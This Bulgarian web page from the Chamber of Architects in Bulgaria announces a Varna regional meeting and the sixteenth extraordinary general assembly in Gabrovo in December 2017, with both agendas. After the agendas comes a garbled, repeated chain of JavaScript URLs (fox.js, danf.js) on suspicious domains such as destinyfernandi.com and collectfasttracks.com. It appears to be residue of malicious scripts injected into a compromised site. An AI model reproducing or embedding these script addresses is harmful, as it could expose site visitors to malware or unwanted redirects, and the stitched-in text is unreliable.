Публикувано на 06.11.2017 / 8:50

Извънредно Общо събрание на КАБ на 01 и 02.12.2017г. в гр. Габрово

Уважаеми колеги,

На 09.11.2017г. от 17.00 часа в Дом на архитекта, ул. Мусала 10 ще проведе Общо събрание на КАБ РК Варна във връзка с провеждането на шестнадесето извънредното Общо събрание на КАБ на 01 и 02 декември в гр. Габрово.
Разчитаме на Вашето присъствие!

ДНЕВЕН РЕД на ОС на КАБ РК Варна- 09.11.2017г:

  1. Избор на делегати за ОС на КАБ в град Габрово; Проект за решение: ОС на КАБ РК Варна реши делегатите на предходното ОС на КАБ в гр. Хисаря, да бъдат преизбрани за делегати в извънредното ОС на КАБ в гр. Габрово.

При липса на кворум към началния час 17.00 часа на 09.11.2017 г., Общото събрание на РК Варна ще започне в 18.00 часа на 09.11.2017 г.


ДНЕВЕН РЕД

ШЕСТНАДЕСЕТО ИЗВЪНРЕДНО ОБЩО СЪБРАНИЕ НА КАБ

1 и 2 декември 2017 г. в гр. Габрово,

от 10.00 часа на 1.12.2017 г.

Тържествено отбелязване на 80-годишен юбилей на Камара на архитектите в България
Приемане на План-програма за дейността и Бюджет на КАБ за 2018 г.; Проект за решение: ОС на КАБ приема План-програма за дейността и Бюджет 2018 г. на КАБ
Приемане на изменения и допълнения в Устава на КАБ; Проект за решение: ОС на КАБ приема изменения и допълнения в Устава на КАБ
Приемане на концепция за законодателството в областта на устройственото планиране, инвестиционно проектиране и строителството
Приемане на обща концепция за прецизиране на условията, при които се получава званието „Архитект“ и се практикува професията
Приемане на решения на Общото събрание на КАБ; Проект на решение: ОС на КАБ приема решенията на Общото събрание на КАБ
Разни
При липса на кворум към началния час 10.00 часа на 1 декември 2017 г., Общото събрание ще започне в 11.00 часа на 1 декември 2017 г.

https://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&kab.bg/vsichki_novini/sbitiya/os_kab_16/

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *